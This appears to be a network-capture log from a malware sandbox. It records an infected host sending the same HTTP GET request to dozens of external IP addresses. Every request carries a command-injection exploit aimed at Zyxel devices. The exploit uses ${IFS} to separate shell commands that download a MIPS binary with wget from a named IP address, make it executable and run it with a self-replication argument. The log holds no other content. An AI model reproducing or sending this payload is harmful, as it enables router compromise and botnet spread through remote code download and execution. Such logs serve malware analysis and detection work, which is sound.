                                    Jan 13, 2024 19:02:45.450865030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7322192.168.2.1347680124.65.254.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450942039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7323192.168.2.1355868158.124.131.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451009989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7324192.168.2.1353310183.188.117.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451076984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7325192.168.2.1355662140.158.202.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451155901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7326192.168.2.135916641.57.237.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451220036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7327192.168.2.1356760177.49.34.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451296091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7328192.168.2.1351256161.10.16.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451358080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7329192.168.2.133543859.3.205.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451430082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7330192.168.2.1359584111.6.232.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451476097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7331192.168.2.1355780154.122.171.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451553106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7332192.168.2.134889249.194.118.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451638937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7333192.168.2.133568032.74.125.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451736927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7334192.168.2.133683240.223.32.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451805115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7335192.168.2.1337972188.50.231.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.451944113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7336192.168.2.1351796176.1.237.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452017069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7337192.168.2.134606861.96.221.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452074051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7338192.168.2.133723872.102.149.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452147961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7339192.168.2.1353168159.165.239.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452243090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7340192.168.2.13537888.185.221.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452290058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7341192.168.2.134432034.22.195.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452380896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7342192.168.2.1345382201.168.103.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452465057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7343192.168.2.13398205.111.150.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452510118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7344192.168.2.13430904.203.28.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452564955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7345192.168.2.1360504193.213.168.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452606916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7346192.168.2.1334564217.200.82.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452687025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7347192.168.2.134433061.191.111.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452754021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7348192.168.2.13594081.235.57.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452800989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7349192.168.2.1356908186.83.192.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452913046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7350192.168.2.1352080105.16.112.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.452980995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7351192.168.2.1336342134.172.214.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453053951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7352192.168.2.1340108122.197.189.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453115940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7353192.168.2.13365725.171.50.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453176975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7354192.168.2.134963625.103.182.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453255892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7355192.168.2.135190861.125.203.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453326941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7356192.168.2.1332986107.90.87.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453399897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7357192.168.2.133426845.156.109.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453458071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7358192.168.2.1360558100.187.146.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453537941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7359192.168.2.1341488195.18.168.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453615904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7360192.168.2.134396092.184.150.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453691006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7361192.168.2.1351028125.83.74.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453778982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7362192.168.2.1360910212.210.144.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453835011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7363192.168.2.135997278.43.28.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453932047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7364192.168.2.1340264119.132.50.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.453984022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7365192.168.2.1352566175.154.115.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454087019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7366192.168.2.134714646.192.186.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454123020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7367192.168.2.1346174152.180.242.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454171896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7368192.168.2.1351202131.124.79.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454274893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7369192.168.2.1345660100.191.99.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454349041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7370192.168.2.1334350102.201.250.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454432011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7371192.168.2.135724699.94.83.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454483986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7372192.168.2.1346228130.29.6.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454565048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7373192.168.2.135055419.60.215.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.454632044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7374192.168.2.1336024187.134.232.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458273888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7375192.168.2.135709438.114.176.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458389044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7376192.168.2.1337768153.195.20.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458412886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7377192.168.2.1336010105.65.108.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458429098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7378192.168.2.133498280.72.9.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458467960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7379192.168.2.134056661.58.22.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458525896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7380192.168.2.1345328179.182.40.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458534956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7381192.168.2.1333194152.45.199.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458576918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7382192.168.2.1359848140.187.5.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458611965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7383192.168.2.134737419.128.251.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458653927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7384192.168.2.1360494101.148.209.163443
                                    TimestampBytes transferredDirectionData
